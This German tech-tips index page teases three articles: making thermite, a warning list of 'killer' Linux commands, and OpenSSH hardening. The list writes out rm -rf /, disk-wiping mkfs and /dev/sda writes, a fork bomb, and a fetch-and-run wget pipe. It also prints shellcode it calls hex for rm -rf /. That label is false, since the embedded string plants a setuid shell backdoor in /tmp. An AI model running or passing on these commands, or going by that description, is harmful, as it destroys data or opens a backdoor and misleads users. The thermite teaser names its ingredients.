Tipps

Thermit herstellen

Methode 1 von 2: Sicherheitsvorkehrungen Thermit ist ein Material, das beim Schweißen verwendet wird, um Metalle miteinander zu verschmelzen. Es verbrennt bei etwa 2200 C und kann durch die meisten Metalle schmelzen. Bei der Herstellung von Thermit ist höchste Vorsicht gefragt. Säubere das Gebiet von allen entflammbaren und brennbaren Materialien und stelle sicher, dass du das, was unter dem Thermit ist, nicht vermissen wirst. Wähle den Platz sorgfältig. Stelle sicher, dass sich nichts Brennbares innerhalb von vier Metern Radius von der Reaktion befindet. Überprüfe, ob sich auch keine Metalle mit niedrigem Schmelzpunkt, wie Blei, Zinn, Kadmium oder Zink, innerhalb des Radius befinden. Trage eine Schweißmaske, um dich vollständig zu schützen, oder zumindest eine Sonnenbrille. Zusätzlich zu der großen Hitze, strahlt Thermit auch hohe UV-Strahlungen aus, die deine Augen schädigen können, wenn du nicht ordentlich aufpasst. Trage kräftige Handschuhe und langärmlige Kleidung. Als Vorsichtsmaßnahme, bedecke dich vollständig mit Kleidung und trage dicke Handschuhe. Methode 2 von 2: Das Thermit herstellen Beschaffe dir feingepulvertes Eisenoxid (Rost), Aluminium und einen dünnen Streifen Magnesium. Das Eisenoxid und das Aluminium reagieren zusammen und formen Thermit, das Magnesium dient dabei als Zündschnur. Du kannst Aluminium in einem Farbengeschäft finden, oder du kannst es über das Internet kaufen.

Continue reading

Top10 Linux Killer Befehle

Top 10 Killer Kommandos - Linux Befehle, die für Ihren Dateien oder sogar Ihr gesamtes Betriebssystem absolut tödlich verlaufen können. Um dieses gefährliche Szenario zu vermeiden, habe hier eine Liste der Top-Ten Linux Killer-Befehle, die Sie unbedingt vermeiden sollten. 1.Code: rm -rf / Dieser Befehl wirkt rekursiv und löscht auf einen Schlag gewaltsam alle Dateien im Root-Verzeichnis. rm-rf / funktioniert allerdings nicht mehr mit den meisten neueren Distributionen. Auch jetzt sind die meisten großen Distributionen (Ubuntu, Fedora, openSUSE, Mandriva) immun dagegen 2.Code: char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; Dies ist die Hex-Version von [rm-rf /] und kann selbst erfahrene Linux-Benutzer täuschen 3.Code: mkfs.ext3 /dev/sda Dieses Kombination formatiert bzw. wiped alle Dateien des Geräts nach dem Befehl mkfs 4.Code: :(){:|:&};: Bekannt als forkbomb, sorgt dieser Befehl dafür, dass das System eine große Anzahl von Prozessen ausführt, solange bis es dann einfriert. Dies kann oft dazu führen, dass die Daten zerstörrt bzw. beschädigt werden 5.Code: any_command > /dev/sda Mit diesem Befehl werden Roh-Daten auf das Block-Gerät geschrieben und kann in der Regel das Dateisystem zerstören, was insgesamt den Verlust von Daten bedeutet. 6.Code: wget http://some\_untrusted\_source -O- | sh

Continue reading

Tutorial: Top 20 OpenSSH Server Security Tipps

OpenSSH ist die Implementierung des SSH-Protokolls. OpenSSH ist für Remote Login empfohlen, das Erstellen von Backups, Remote-File-Transfer per SCP oder SFTP, und vieles mehr. SSH ist ideal, um die Vertraulichkeit und Integrität von Daten zwischen zwei Netzwerken und Systemen austauschen. Allerdings ist der Hauptvorteil Server-Authentifizierung, durch den Einsatz von Public-Key-Kryptographie. Von Zeit zu Zeit gibt es Gerüchte über OpenSSH Zero-Day-Exploit. Hier sind ein paar Dinge, die Sie zu zwicken, um OpenSSH-Server-Sicherheit zu verbessern. Die Default Config Files und der SSH Port /etc/ssh/sshd_config - OpenSSH server configuration file. /etc/ssh/ssh_config - OpenSSH client configuration file. ~/.ssh/ - Users ssh configuration directory. ~/.ssh/authorized_keys or ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user’s account /etc/nologin - If this file exists, sshd refuses to let anyone except root log in. /etc/hosts.allow and /etc/hosts.deny : Access controls lists that should be enforced by tcp-wrappers are defined here. SSH default port : TCP 22 Tipp Nr. 01: OpenSSH Server Deaktivieren Laptops und Workstationen funktionieren auch ohne OpenSSH-Server. Wenn Sie nicht mit Remote Login und einer Dateiübertragungsfunktionen per SSH arbeiten, deaktivieren und entfernen Sie den sshd-Server. RHEL / Fedora / CentOS Linux-Benutzer deaktivieren und entfernen den openssh-server mit dem yum Befehl:

Continue reading